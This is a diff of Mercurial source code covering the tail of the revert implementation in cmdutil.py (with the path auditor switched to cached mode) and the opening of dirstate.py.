3343 # modified, we need to post process the result
3344 if p2 != nullid:
3344 if p2 != nullid:
3345 mergeadd = set(dsmodified)
3345 mergeadd = set(dsmodified)
3346 for path in dsmodified:
3346 for path in dsmodified:
3347 if path in mf:
3347 if path in mf:
3348 mergeadd.remove(path)
3348 mergeadd.remove(path)
3349 dsadded |= mergeadd
3349 dsadded |= mergeadd
3350 dsmodified -= mergeadd
3350 dsmodified -= mergeadd
3351
3351
3352 # if f is a rename, update `names` to also revert the source
3352 # if f is a rename, update `names` to also revert the source
3353 cwd = repo.getcwd()
3353 cwd = repo.getcwd()
3354 for f in localchanges:
3354 for f in localchanges:
3355 src = repo.dirstate.copied(f)
3355 src = repo.dirstate.copied(f)
3356 # XXX should we check for rename down to target node?
3356 # XXX should we check for rename down to target node?
3357 if src and src not in names and repo.dirstate[src] == 'r':
3357 if src and src not in names and repo.dirstate[src] == 'r':
3358 dsremoved.add(src)
3358 dsremoved.add(src)
3359 names[src] = (repo.pathto(src, cwd), True)
3359 names[src] = (repo.pathto(src, cwd), True)
3360
3360
3361 # determine the exact nature of the deleted changesets
3361 # determine the exact nature of the deleted changesets
3362 deladded = set(_deleted)
3362 deladded = set(_deleted)
3363 for path in _deleted:
3363 for path in _deleted:
3364 if path in mf:
3364 if path in mf:
3365 deladded.remove(path)
3365 deladded.remove(path)
3366 deleted = _deleted - deladded
3366 deleted = _deleted - deladded
3367
3367
3368 # distinguish between file to forget and the other
3368 # distinguish between file to forget and the other
3369 added = set()
3369 added = set()
3370 for abs in dsadded:
3370 for abs in dsadded:
3371 if repo.dirstate[abs] != 'a':
3371 if repo.dirstate[abs] != 'a':
3372 added.add(abs)
3372 added.add(abs)
3373 dsadded -= added
3373 dsadded -= added
3374
3374
3375 for abs in deladded:
3375 for abs in deladded:
3376 if repo.dirstate[abs] == 'a':
3376 if repo.dirstate[abs] == 'a':
3377 dsadded.add(abs)
3377 dsadded.add(abs)
3378 deladded -= dsadded
3378 deladded -= dsadded
3379
3379
3380 # For files marked as removed, we check if an unknown file is present at
3380 # For files marked as removed, we check if an unknown file is present at
3381 # the same path. If a such file exists it may need to be backed up.
3381 # the same path. If a such file exists it may need to be backed up.
3382 # Making the distinction at this stage helps have simpler backup
3382 # Making the distinction at this stage helps have simpler backup
3383 # logic.
3383 # logic.
3384 removunk = set()
3384 removunk = set()
3385 for abs in removed:
3385 for abs in removed:
3386 target = repo.wjoin(abs)
3386 target = repo.wjoin(abs)
3387 if os.path.lexists(target):
3387 if os.path.lexists(target):
3388 removunk.add(abs)
3388 removunk.add(abs)
3389 removed -= removunk
3389 removed -= removunk
3390
3390
3391 dsremovunk = set()
3391 dsremovunk = set()
3392 for abs in dsremoved:
3392 for abs in dsremoved:
3393 target = repo.wjoin(abs)
3393 target = repo.wjoin(abs)
3394 if os.path.lexists(target):
3394 if os.path.lexists(target):
3395 dsremovunk.add(abs)
3395 dsremovunk.add(abs)
3396 dsremoved -= dsremovunk
3396 dsremoved -= dsremovunk
3397
3397
3398 # action to be actually performed by revert
3398 # action to be actually performed by revert
3399 # (<list of file>, message>) tuple
3399 # (<list of file>, message>) tuple
3400 actions = {'revert': ([], _('reverting %s\n')),
3400 actions = {'revert': ([], _('reverting %s\n')),
3401 'add': ([], _('adding %s\n')),
3401 'add': ([], _('adding %s\n')),
3402 'remove': ([], _('removing %s\n')),
3402 'remove': ([], _('removing %s\n')),
3403 'drop': ([], _('removing %s\n')),
3403 'drop': ([], _('removing %s\n')),
3404 'forget': ([], _('forgetting %s\n')),
3404 'forget': ([], _('forgetting %s\n')),
3405 'undelete': ([], _('undeleting %s\n')),
3405 'undelete': ([], _('undeleting %s\n')),
3406 'noop': (None, _('no changes needed to %s\n')),
3406 'noop': (None, _('no changes needed to %s\n')),
3407 'unknown': (None, _('file not managed: %s\n')),
3407 'unknown': (None, _('file not managed: %s\n')),
3408 }
3408 }
3409
3409
3410 # "constant" that convey the backup strategy.
3410 # "constant" that convey the backup strategy.
3411 # All set to `discard` if `no-backup` is set do avoid checking
3411 # All set to `discard` if `no-backup` is set do avoid checking
3412 # no_backup lower in the code.
3412 # no_backup lower in the code.
3413 # These values are ordered for comparison purposes
3413 # These values are ordered for comparison purposes
3414 backupinteractive = 3 # do backup if interactively modified
3414 backupinteractive = 3 # do backup if interactively modified
3415 backup = 2 # unconditionally do backup
3415 backup = 2 # unconditionally do backup
3416 check = 1 # check if the existing file differs from target
3416 check = 1 # check if the existing file differs from target
3417 discard = 0 # never do backup
3417 discard = 0 # never do backup
3418 if opts.get('no_backup'):
3418 if opts.get('no_backup'):
3419 backupinteractive = backup = check = discard
3419 backupinteractive = backup = check = discard
3420 if interactive:
3420 if interactive:
3421 dsmodifiedbackup = backupinteractive
3421 dsmodifiedbackup = backupinteractive
3422 else:
3422 else:
3423 dsmodifiedbackup = backup
3423 dsmodifiedbackup = backup
3424 tobackup = set()
3424 tobackup = set()
3425
3425
3426 backupanddel = actions['remove']
3426 backupanddel = actions['remove']
3427 if not opts.get('no_backup'):
3427 if not opts.get('no_backup'):
3428 backupanddel = actions['drop']
3428 backupanddel = actions['drop']
3429
3429
3430 disptable = (
3430 disptable = (
3431 # dispatch table:
3431 # dispatch table:
3432 # file state
3432 # file state
3433 # action
3433 # action
3434 # make backup
3434 # make backup
3435
3435
3436 ## Sets that results that will change file on disk
3436 ## Sets that results that will change file on disk
3437 # Modified compared to target, no local change
3437 # Modified compared to target, no local change
3438 (modified, actions['revert'], discard),
3438 (modified, actions['revert'], discard),
3439 # Modified compared to target, but local file is deleted
3439 # Modified compared to target, but local file is deleted
3440 (deleted, actions['revert'], discard),
3440 (deleted, actions['revert'], discard),
3441 # Modified compared to target, local change
3441 # Modified compared to target, local change
3442 (dsmodified, actions['revert'], dsmodifiedbackup),
3442 (dsmodified, actions['revert'], dsmodifiedbackup),
3443 # Added since target
3443 # Added since target
3444 (added, actions['remove'], discard),
3444 (added, actions['remove'], discard),
3445 # Added in working directory
3445 # Added in working directory
3446 (dsadded, actions['forget'], discard),
3446 (dsadded, actions['forget'], discard),
3447 # Added since target, have local modification
3447 # Added since target, have local modification
3448 (modadded, backupanddel, backup),
3448 (modadded, backupanddel, backup),
3449 # Added since target but file is missing in working directory
3449 # Added since target but file is missing in working directory
3450 (deladded, actions['drop'], discard),
3450 (deladded, actions['drop'], discard),
3451 # Removed since target, before working copy parent
3451 # Removed since target, before working copy parent
3452 (removed, actions['add'], discard),
3452 (removed, actions['add'], discard),
3453 # Same as `removed` but an unknown file exists at the same path
3453 # Same as `removed` but an unknown file exists at the same path
3454 (removunk, actions['add'], check),
3454 (removunk, actions['add'], check),
3455 # Removed since targe, marked as such in working copy parent
3455 # Removed since targe, marked as such in working copy parent
3456 (dsremoved, actions['undelete'], discard),
3456 (dsremoved, actions['undelete'], discard),
3457 # Same as `dsremoved` but an unknown file exists at the same path
3457 # Same as `dsremoved` but an unknown file exists at the same path
3458 (dsremovunk, actions['undelete'], check),
3458 (dsremovunk, actions['undelete'], check),
3459 ## the following sets does not result in any file changes
3459 ## the following sets does not result in any file changes
3460 # File with no modification
3460 # File with no modification
3461 (clean, actions['noop'], discard),
3461 (clean, actions['noop'], discard),
3462 # Existing file, not tracked anywhere
3462 # Existing file, not tracked anywhere
3463 (unknown, actions['unknown'], discard),
3463 (unknown, actions['unknown'], discard),
3464 )
3464 )
3465
3465
3466 for abs, (rel, exact) in sorted(names.items()):
3466 for abs, (rel, exact) in sorted(names.items()):
3467 # target file to be touch on disk (relative to cwd)
3467 # target file to be touch on disk (relative to cwd)
3468 target = repo.wjoin(abs)
3468 target = repo.wjoin(abs)
3469 # search the entry in the dispatch table.
3469 # search the entry in the dispatch table.
3470 # if the file is in any of these sets, it was touched in the working
3470 # if the file is in any of these sets, it was touched in the working
3471 # directory parent and we are sure it needs to be reverted.
3471 # directory parent and we are sure it needs to be reverted.
3472 for table, (xlist, msg), dobackup in disptable:
3472 for table, (xlist, msg), dobackup in disptable:
3473 if abs not in table:
3473 if abs not in table:
3474 continue
3474 continue
3475 if xlist is not None:
3475 if xlist is not None:
3476 xlist.append(abs)
3476 xlist.append(abs)
3477 if dobackup:
3477 if dobackup:
3478 # If in interactive mode, don't automatically create
3478 # If in interactive mode, don't automatically create
3479 # .orig files (issue4793)
3479 # .orig files (issue4793)
3480 if dobackup == backupinteractive:
3480 if dobackup == backupinteractive:
3481 tobackup.add(abs)
3481 tobackup.add(abs)
3482 elif (backup <= dobackup or wctx[abs].cmp(ctx[abs])):
3482 elif (backup <= dobackup or wctx[abs].cmp(ctx[abs])):
3483 bakname = scmutil.origpath(ui, repo, rel)
3483 bakname = scmutil.origpath(ui, repo, rel)
3484 ui.note(_('saving current version of %s as %s\n') %
3484 ui.note(_('saving current version of %s as %s\n') %
3485 (rel, bakname))
3485 (rel, bakname))
3486 if not opts.get('dry_run'):
3486 if not opts.get('dry_run'):
3487 if interactive:
3487 if interactive:
3488 util.copyfile(target, bakname)
3488 util.copyfile(target, bakname)
3489 else:
3489 else:
3490 util.rename(target, bakname)
3490 util.rename(target, bakname)
3491 if ui.verbose or not exact:
3491 if ui.verbose or not exact:
3492 if not isinstance(msg, basestring):
3492 if not isinstance(msg, basestring):
3493 msg = msg(abs)
3493 msg = msg(abs)
3494 ui.status(msg % rel)
3494 ui.status(msg % rel)
3495 elif exact:
3495 elif exact:
3496 ui.warn(msg % rel)
3496 ui.warn(msg % rel)
3497 break
3497 break
3498
3498
3499 if not opts.get('dry_run'):
3499 if not opts.get('dry_run'):
3500 needdata = ('revert', 'add', 'undelete')
3500 needdata = ('revert', 'add', 'undelete')
3501 _revertprefetch(repo, ctx, *[actions[name][0] for name in needdata])
3501 _revertprefetch(repo, ctx, *[actions[name][0] for name in needdata])
3502 _performrevert(repo, parents, ctx, actions, interactive, tobackup)
3502 _performrevert(repo, parents, ctx, actions, interactive, tobackup)
3503
3503
3504 if targetsubs:
3504 if targetsubs:
3505 # Revert the subrepos on the revert list
3505 # Revert the subrepos on the revert list
3506 for sub in targetsubs:
3506 for sub in targetsubs:
3507 try:
3507 try:
3508 wctx.sub(sub).revert(ctx.substate[sub], *pats, **opts)
3508 wctx.sub(sub).revert(ctx.substate[sub], *pats, **opts)
3509 except KeyError:
3509 except KeyError:
3510 raise error.Abort("subrepository '%s' does not exist in %s!"
3510 raise error.Abort("subrepository '%s' does not exist in %s!"
3511 % (sub, short(ctx.node())))
3511 % (sub, short(ctx.node())))
3512
3512
3513 def _revertprefetch(repo, ctx, *files):
3513 def _revertprefetch(repo, ctx, *files):
3514 """Let extension changing the storage layer prefetch content"""
3514 """Let extension changing the storage layer prefetch content"""
3515 pass
3515 pass
3516
3516
3517 def _performrevert(repo, parents, ctx, actions, interactive=False,
3517 def _performrevert(repo, parents, ctx, actions, interactive=False,
3518 tobackup=None):
3518 tobackup=None):
3519 """function that actually perform all the actions computed for revert
3519 """function that actually perform all the actions computed for revert
3520
3520
3521 This is an independent function to let extension to plug in and react to
3521 This is an independent function to let extension to plug in and react to
3522 the imminent revert.
3522 the imminent revert.
3523
3523
3524 Make sure you have the working directory locked when calling this function.
3524 Make sure you have the working directory locked when calling this function.
3525 """
3525 """
3526 parent, p2 = parents
3526 parent, p2 = parents
3527 node = ctx.node()
3527 node = ctx.node()
3528 excluded_files = []
3528 excluded_files = []
3529 matcher_opts = {"exclude": excluded_files}
3529 matcher_opts = {"exclude": excluded_files}
3530
3530
3531 def checkout(f):
3531 def checkout(f):
3532 fc = ctx[f]
3532 fc = ctx[f]
3533 repo.wwrite(f, fc.data(), fc.flags())
3533 repo.wwrite(f, fc.data(), fc.flags())
3534
3534
3535 def doremove(f):
3535 def doremove(f):
3536 try:
3536 try:
3537 repo.wvfs.unlinkpath(f)
3537 repo.wvfs.unlinkpath(f)
3538 except OSError:
3538 except OSError:
3539 pass
3539 pass
3540 repo.dirstate.remove(f)
3540 repo.dirstate.remove(f)
3541
3541
3542 audit_path = pathutil.pathauditor(repo.root)
3542 audit_path = pathutil.pathauditor(repo.root, cached=True)
3543 for f in actions['forget'][0]:
3543 for f in actions['forget'][0]:
3544 if interactive:
3544 if interactive:
3545 choice = repo.ui.promptchoice(
3545 choice = repo.ui.promptchoice(
3546 _("forget added file %s (Yn)?$$ &Yes $$ &No") % f)
3546 _("forget added file %s (Yn)?$$ &Yes $$ &No") % f)
3547 if choice == 0:
3547 if choice == 0:
3548 repo.dirstate.drop(f)
3548 repo.dirstate.drop(f)
3549 else:
3549 else:
3550 excluded_files.append(repo.wjoin(f))
3550 excluded_files.append(repo.wjoin(f))
3551 else:
3551 else:
3552 repo.dirstate.drop(f)
3552 repo.dirstate.drop(f)
3553 for f in actions['remove'][0]:
3553 for f in actions['remove'][0]:
3554 audit_path(f)
3554 audit_path(f)
3555 if interactive:
3555 if interactive:
3556 choice = repo.ui.promptchoice(
3556 choice = repo.ui.promptchoice(
3557 _("remove added file %s (Yn)?$$ &Yes $$ &No") % f)
3557 _("remove added file %s (Yn)?$$ &Yes $$ &No") % f)
3558 if choice == 0:
3558 if choice == 0:
3559 doremove(f)
3559 doremove(f)
3560 else:
3560 else:
3561 excluded_files.append(repo.wjoin(f))
3561 excluded_files.append(repo.wjoin(f))
3562 else:
3562 else:
3563 doremove(f)
3563 doremove(f)
3564 for f in actions['drop'][0]:
3564 for f in actions['drop'][0]:
3565 audit_path(f)
3565 audit_path(f)
3566 repo.dirstate.remove(f)
3566 repo.dirstate.remove(f)
3567
3567
3568 normal = None
3568 normal = None
3569 if node == parent:
3569 if node == parent:
3570 # We're reverting to our parent. If possible, we'd like status
3570 # We're reverting to our parent. If possible, we'd like status
3571 # to report the file as clean. We have to use normallookup for
3571 # to report the file as clean. We have to use normallookup for
3572 # merges to avoid losing information about merged/dirty files.
3572 # merges to avoid losing information about merged/dirty files.
3573 if p2 != nullid:
3573 if p2 != nullid:
3574 normal = repo.dirstate.normallookup
3574 normal = repo.dirstate.normallookup
3575 else:
3575 else:
3576 normal = repo.dirstate.normal
3576 normal = repo.dirstate.normal
3577
3577
3578 newlyaddedandmodifiedfiles = set()
3578 newlyaddedandmodifiedfiles = set()
3579 if interactive:
3579 if interactive:
3580 # Prompt the user for changes to revert
3580 # Prompt the user for changes to revert
3581 torevert = [repo.wjoin(f) for f in actions['revert'][0]]
3581 torevert = [repo.wjoin(f) for f in actions['revert'][0]]
3582 m = scmutil.match(ctx, torevert, matcher_opts)
3582 m = scmutil.match(ctx, torevert, matcher_opts)
3583 diffopts = patch.difffeatureopts(repo.ui, whitespace=True)
3583 diffopts = patch.difffeatureopts(repo.ui, whitespace=True)
3584 diffopts.nodates = True
3584 diffopts.nodates = True
3585 diffopts.git = True
3585 diffopts.git = True
3586 operation = 'discard'
3586 operation = 'discard'
3587 reversehunks = True
3587 reversehunks = True
3588 if node != parent:
3588 if node != parent:
3589 operation = 'revert'
3589 operation = 'revert'
3590 reversehunks = repo.ui.configbool('experimental',
3590 reversehunks = repo.ui.configbool('experimental',
3591 'revertalternateinteractivemode')
3591 'revertalternateinteractivemode')
3592 if reversehunks:
3592 if reversehunks:
3593 diff = patch.diff(repo, ctx.node(), None, m, opts=diffopts)
3593 diff = patch.diff(repo, ctx.node(), None, m, opts=diffopts)
3594 else:
3594 else:
3595 diff = patch.diff(repo, None, ctx.node(), m, opts=diffopts)
3595 diff = patch.diff(repo, None, ctx.node(), m, opts=diffopts)
3596 originalchunks = patch.parsepatch(diff)
3596 originalchunks = patch.parsepatch(diff)
3597
3597
3598 try:
3598 try:
3599
3599
3600 chunks, opts = recordfilter(repo.ui, originalchunks,
3600 chunks, opts = recordfilter(repo.ui, originalchunks,
3601 operation=operation)
3601 operation=operation)
3602 if reversehunks:
3602 if reversehunks:
3603 chunks = patch.reversehunks(chunks)
3603 chunks = patch.reversehunks(chunks)
3604
3604
3605 except patch.PatchError as err:
3605 except patch.PatchError as err:
3606 raise error.Abort(_('error parsing patch: %s') % err)
3606 raise error.Abort(_('error parsing patch: %s') % err)
3607
3607
3608 newlyaddedandmodifiedfiles = newandmodified(chunks, originalchunks)
3608 newlyaddedandmodifiedfiles = newandmodified(chunks, originalchunks)
3609 if tobackup is None:
3609 if tobackup is None:
3610 tobackup = set()
3610 tobackup = set()
3611 # Apply changes
3611 # Apply changes
3612 fp = stringio()
3612 fp = stringio()
3613 for c in chunks:
3613 for c in chunks:
3614 # Create a backup file only if this hunk should be backed up
3614 # Create a backup file only if this hunk should be backed up
3615 if ishunk(c) and c.header.filename() in tobackup:
3615 if ishunk(c) and c.header.filename() in tobackup:
3616 abs = c.header.filename()
3616 abs = c.header.filename()
3617 target = repo.wjoin(abs)
3617 target = repo.wjoin(abs)
3618 bakname = scmutil.origpath(repo.ui, repo, m.rel(abs))
3618 bakname = scmutil.origpath(repo.ui, repo, m.rel(abs))
3619 util.copyfile(target, bakname)
3619 util.copyfile(target, bakname)
3620 tobackup.remove(abs)
3620 tobackup.remove(abs)
3621 c.write(fp)
3621 c.write(fp)
3622 dopatch = fp.tell()
3622 dopatch = fp.tell()
3623 fp.seek(0)
3623 fp.seek(0)
3624 if dopatch:
3624 if dopatch:
3625 try:
3625 try:
3626 patch.internalpatch(repo.ui, repo, fp, 1, eolmode=None)
3626 patch.internalpatch(repo.ui, repo, fp, 1, eolmode=None)
3627 except patch.PatchError as err:
3627 except patch.PatchError as err:
3628 raise error.Abort(str(err))
3628 raise error.Abort(str(err))
3629 del fp
3629 del fp
3630 else:
3630 else:
3631 for f in actions['revert'][0]:
3631 for f in actions['revert'][0]:
3632 checkout(f)
3632 checkout(f)
3633 if normal:
3633 if normal:
3634 normal(f)
3634 normal(f)
3635
3635
3636 for f in actions['add'][0]:
3636 for f in actions['add'][0]:
3637 # Don't checkout modified files, they are already created by the diff
3637 # Don't checkout modified files, they are already created by the diff
3638 if f not in newlyaddedandmodifiedfiles:
3638 if f not in newlyaddedandmodifiedfiles:
3639 checkout(f)
3639 checkout(f)
3640 repo.dirstate.add(f)
3640 repo.dirstate.add(f)
3641
3641
3642 normal = repo.dirstate.normallookup
3642 normal = repo.dirstate.normallookup
3643 if node == parent and p2 == nullid:
3643 if node == parent and p2 == nullid:
3644 normal = repo.dirstate.normal
3644 normal = repo.dirstate.normal
3645 for f in actions['undelete'][0]:
3645 for f in actions['undelete'][0]:
3646 checkout(f)
3646 checkout(f)
3647 normal(f)
3647 normal(f)
3648
3648
3649 copied = copies.pathcopies(repo[parent], ctx)
3649 copied = copies.pathcopies(repo[parent], ctx)
3650
3650
3651 for f in actions['add'][0] + actions['undelete'][0] + actions['revert'][0]:
3651 for f in actions['add'][0] + actions['undelete'][0] + actions['revert'][0]:
3652 if f in copied:
3652 if f in copied:
3653 repo.dirstate.copy(copied[f], f)
3653 repo.dirstate.copy(copied[f], f)
3654
3654
3655 class command(registrar.command):
3655 class command(registrar.command):
3656 def _doregister(self, func, name, *args, **kwargs):
3656 def _doregister(self, func, name, *args, **kwargs):
3657 func._deprecatedregistrar = True # flag for deprecwarn in extensions.py
3657 func._deprecatedregistrar = True # flag for deprecwarn in extensions.py
3658 return super(command, self)._doregister(func, name, *args, **kwargs)
3658 return super(command, self)._doregister(func, name, *args, **kwargs)
3659
3659
3660 # a list of (ui, repo, otherpeer, opts, missing) functions called by
3660 # a list of (ui, repo, otherpeer, opts, missing) functions called by
3661 # commands.outgoing. "missing" is "missing" of the result of
3661 # commands.outgoing. "missing" is "missing" of the result of
3662 # "findcommonoutgoing()"
3662 # "findcommonoutgoing()"
3663 outgoinghooks = util.hooks()
3663 outgoinghooks = util.hooks()
3664
3664
3665 # a list of (ui, repo) functions called by commands.summary
3665 # a list of (ui, repo) functions called by commands.summary
3666 summaryhooks = util.hooks()
3666 summaryhooks = util.hooks()
3667
3667
3668 # a list of (ui, repo, opts, changes) functions called by commands.summary.
3668 # a list of (ui, repo, opts, changes) functions called by commands.summary.
3669 #
3669 #
3670 # functions should return tuple of booleans below, if 'changes' is None:
3670 # functions should return tuple of booleans below, if 'changes' is None:
3671 # (whether-incomings-are-needed, whether-outgoings-are-needed)
3671 # (whether-incomings-are-needed, whether-outgoings-are-needed)
3672 #
3672 #
3673 # otherwise, 'changes' is a tuple of tuples below:
3673 # otherwise, 'changes' is a tuple of tuples below:
3674 # - (sourceurl, sourcebranch, sourcepeer, incoming)
3674 # - (sourceurl, sourcebranch, sourcepeer, incoming)
3675 # - (desturl, destbranch, destpeer, outgoing)
3675 # - (desturl, destbranch, destpeer, outgoing)
3676 summaryremotehooks = util.hooks()
3676 summaryremotehooks = util.hooks()
3677
3677
3678 # A list of state files kept by multistep operations like graft.
3678 # A list of state files kept by multistep operations like graft.
3679 # Since graft cannot be aborted, it is considered 'clearable' by update.
3679 # Since graft cannot be aborted, it is considered 'clearable' by update.
3680 # note: bisect is intentionally excluded
3680 # note: bisect is intentionally excluded
3681 # (state file, clearable, allowcommit, error, hint)
3681 # (state file, clearable, allowcommit, error, hint)
3682 unfinishedstates = [
3682 unfinishedstates = [
3683 ('graftstate', True, False, _('graft in progress'),
3683 ('graftstate', True, False, _('graft in progress'),
3684 _("use 'hg graft --continue' or 'hg update' to abort")),
3684 _("use 'hg graft --continue' or 'hg update' to abort")),
3685 ('updatestate', True, False, _('last update was interrupted'),
3685 ('updatestate', True, False, _('last update was interrupted'),
3686 _("use 'hg update' to get a consistent checkout"))
3686 _("use 'hg update' to get a consistent checkout"))
3687 ]
3687 ]
3688
3688
3689 def checkunfinished(repo, commit=False):
3689 def checkunfinished(repo, commit=False):
3690 '''Look for an unfinished multistep operation, like graft, and abort
3690 '''Look for an unfinished multistep operation, like graft, and abort
3691 if found. It's probably good to check this right before
3691 if found. It's probably good to check this right before
3692 bailifchanged().
3692 bailifchanged().
3693 '''
3693 '''
3694 for f, clearable, allowcommit, msg, hint in unfinishedstates:
3694 for f, clearable, allowcommit, msg, hint in unfinishedstates:
3695 if commit and allowcommit:
3695 if commit and allowcommit:
3696 continue
3696 continue
3697 if repo.vfs.exists(f):
3697 if repo.vfs.exists(f):
3698 raise error.Abort(msg, hint=hint)
3698 raise error.Abort(msg, hint=hint)
3699
3699
3700 def clearunfinished(repo):
3700 def clearunfinished(repo):
3701 '''Check for unfinished operations (as above), and clear the ones
3701 '''Check for unfinished operations (as above), and clear the ones
3702 that are clearable.
3702 that are clearable.
3703 '''
3703 '''
3704 for f, clearable, allowcommit, msg, hint in unfinishedstates:
3704 for f, clearable, allowcommit, msg, hint in unfinishedstates:
3705 if not clearable and repo.vfs.exists(f):
3705 if not clearable and repo.vfs.exists(f):
3706 raise error.Abort(msg, hint=hint)
3706 raise error.Abort(msg, hint=hint)
3707 for f, clearable, allowcommit, msg, hint in unfinishedstates:
3707 for f, clearable, allowcommit, msg, hint in unfinishedstates:
3708 if clearable and repo.vfs.exists(f):
3708 if clearable and repo.vfs.exists(f):
3709 util.unlink(repo.vfs.join(f))
3709 util.unlink(repo.vfs.join(f))
3710
3710
3711 afterresolvedstates = [
3711 afterresolvedstates = [
3712 ('graftstate',
3712 ('graftstate',
3713 _('hg graft --continue')),
3713 _('hg graft --continue')),
3714 ]
3714 ]
3715
3715
3716 def howtocontinue(repo):
3716 def howtocontinue(repo):
3717 '''Check for an unfinished operation and return the command to finish
3717 '''Check for an unfinished operation and return the command to finish
3718 it.
3718 it.
3719
3719
3720 afterresolvedstates tuples define a .hg/{file} and the corresponding
3720 afterresolvedstates tuples define a .hg/{file} and the corresponding
3721 command needed to finish it.
3721 command needed to finish it.
3722
3722
3723 Returns a (msg, warning) tuple. 'msg' is a string and 'warning' is
3723 Returns a (msg, warning) tuple. 'msg' is a string and 'warning' is
3724 a boolean.
3724 a boolean.
3725 '''
3725 '''
3726 contmsg = _("continue: %s")
3726 contmsg = _("continue: %s")
3727 for f, msg in afterresolvedstates:
3727 for f, msg in afterresolvedstates:
3728 if repo.vfs.exists(f):
3728 if repo.vfs.exists(f):
3729 return contmsg % msg, True
3729 return contmsg % msg, True
3730 if repo[None].dirty(missing=True, merge=False, branch=False):
3730 if repo[None].dirty(missing=True, merge=False, branch=False):
3731 return contmsg % _("hg commit"), False
3731 return contmsg % _("hg commit"), False
3732 return None, None
3732 return None, None
3733
3733
3734 def checkafterresolved(repo):
3734 def checkafterresolved(repo):
3735 '''Inform the user about the next action after completing hg resolve
3735 '''Inform the user about the next action after completing hg resolve
3736
3736
3737 If there's a matching afterresolvedstates, howtocontinue will yield
3737 If there's a matching afterresolvedstates, howtocontinue will yield
3738 repo.ui.warn as the reporter.
3738 repo.ui.warn as the reporter.
3739
3739
3740 Otherwise, it will yield repo.ui.note.
3740 Otherwise, it will yield repo.ui.note.
3741 '''
3741 '''
3742 msg, warning = howtocontinue(repo)
3742 msg, warning = howtocontinue(repo)
3743 if msg is not None:
3743 if msg is not None:
3744 if warning:
3744 if warning:
3745 repo.ui.warn("%s\n" % msg)
3745 repo.ui.warn("%s\n" % msg)
3746 else:
3746 else:
3747 repo.ui.note("%s\n" % msg)
3747 repo.ui.note("%s\n" % msg)
3748
3748
3749 def wrongtooltocontinue(repo, task):
3749 def wrongtooltocontinue(repo, task):
3750 '''Raise an abort suggesting how to properly continue if there is an
3750 '''Raise an abort suggesting how to properly continue if there is an
3751 active task.
3751 active task.
3752
3752
3753 Uses howtocontinue() to find the active task.
3753 Uses howtocontinue() to find the active task.
3754
3754
3755 If there's no task (repo.ui.note for 'hg commit'), it does not offer
3755 If there's no task (repo.ui.note for 'hg commit'), it does not offer
3756 a hint.
3756 a hint.
3757 '''
3757 '''
3758 after = howtocontinue(repo)
3758 after = howtocontinue(repo)
3759 hint = None
3759 hint = None
3760 if after[1]:
3760 if after[1]:
3761 hint = after[0]
3761 hint = after[0]
3762 raise error.Abort(_('no %s in progress') % task, hint=hint)
3762 raise error.Abort(_('no %s in progress') % task, hint=hint)
@@ -1,1342 +1,1342 b''
1 # dirstate.py - working directory tracking for mercurial
1 # dirstate.py - working directory tracking for mercurial
2 #
2 #
3 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
3 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import
8 from __future__ import absolute_import
9
9
10 import collections
10 import collections
11 import contextlib
11 import contextlib
12 import errno
12 import errno
13 import os
13 import os
14 import stat
14 import stat
15
15
16 from .i18n import _
16 from .i18n import _
17 from .node import nullid
17 from .node import nullid
18 from . import (
18 from . import (
19 encoding,
19 encoding,
20 error,
20 error,
21 match as matchmod,
21 match as matchmod,
22 pathutil,
22 pathutil,
23 policy,
23 policy,
24 pycompat,
24 pycompat,
25 scmutil,
25 scmutil,
26 txnutil,
26 txnutil,
27 util,
27 util,
28 )
28 )
29
29
30 parsers = policy.importmod(r'parsers')
30 parsers = policy.importmod(r'parsers')
31
31
32 propertycache = util.propertycache
32 propertycache = util.propertycache
33 filecache = scmutil.filecache
33 filecache = scmutil.filecache
34 _rangemask = 0x7fffffff
34 _rangemask = 0x7fffffff
35
35
36 dirstatetuple = parsers.dirstatetuple
36 dirstatetuple = parsers.dirstatetuple
37
37
38 class repocache(filecache):
38 class repocache(filecache):
39 """filecache for files in .hg/"""
39 """filecache for files in .hg/"""
40 def join(self, obj, fname):
40 def join(self, obj, fname):
41 return obj._opener.join(fname)
41 return obj._opener.join(fname)
42
42
43 class rootcache(filecache):
43 class rootcache(filecache):
44 """filecache for files in the repository root"""
44 """filecache for files in the repository root"""
45 def join(self, obj, fname):
45 def join(self, obj, fname):
46 return obj._join(fname)
46 return obj._join(fname)
47
47
48 def _getfsnow(vfs):
48 def _getfsnow(vfs):
49 '''Get "now" timestamp on filesystem'''
49 '''Get "now" timestamp on filesystem'''
50 tmpfd, tmpname = vfs.mkstemp()
50 tmpfd, tmpname = vfs.mkstemp()
51 try:
51 try:
52 return os.fstat(tmpfd).st_mtime
52 return os.fstat(tmpfd).st_mtime
53 finally:
53 finally:
54 os.close(tmpfd)
54 os.close(tmpfd)
55 vfs.unlink(tmpname)
55 vfs.unlink(tmpname)
56
56
57 def nonnormalentries(dmap):
57 def nonnormalentries(dmap):
58 '''Compute the nonnormal dirstate entries from the dmap'''
58 '''Compute the nonnormal dirstate entries from the dmap'''
59 try:
59 try:
60 return parsers.nonnormalotherparententries(dmap)
60 return parsers.nonnormalotherparententries(dmap)
61 except AttributeError:
61 except AttributeError:
62 nonnorm = set()
62 nonnorm = set()
63 otherparent = set()
63 otherparent = set()
64 for fname, e in dmap.iteritems():
64 for fname, e in dmap.iteritems():
65 if e[0] != 'n' or e[3] == -1:
65 if e[0] != 'n' or e[3] == -1:
66 nonnorm.add(fname)
66 nonnorm.add(fname)
67 if e[0] == 'n' and e[2] == -2:
67 if e[0] == 'n' and e[2] == -2:
68 otherparent.add(fname)
68 otherparent.add(fname)
69 return nonnorm, otherparent
69 return nonnorm, otherparent
70
70
71 class dirstate(object):
71 class dirstate(object):
72
72
73 def __init__(self, opener, ui, root, validate, sparsematchfn):
73 def __init__(self, opener, ui, root, validate, sparsematchfn):
74 '''Create a new dirstate object.
74 '''Create a new dirstate object.
75
75
76 opener is an open()-like callable that can be used to open the
76 opener is an open()-like callable that can be used to open the
77 dirstate file; root is the root of the directory tracked by
77 dirstate file; root is the root of the directory tracked by
78 the dirstate.
78 the dirstate.
79 '''
79 '''
80 self._opener = opener
80 self._opener = opener
81 self._validate = validate
81 self._validate = validate
82 self._root = root
82 self._root = root
83 self._sparsematchfn = sparsematchfn
83 self._sparsematchfn = sparsematchfn
84 # ntpath.join(root, '') of Python 2.7.9 does not add sep if root is
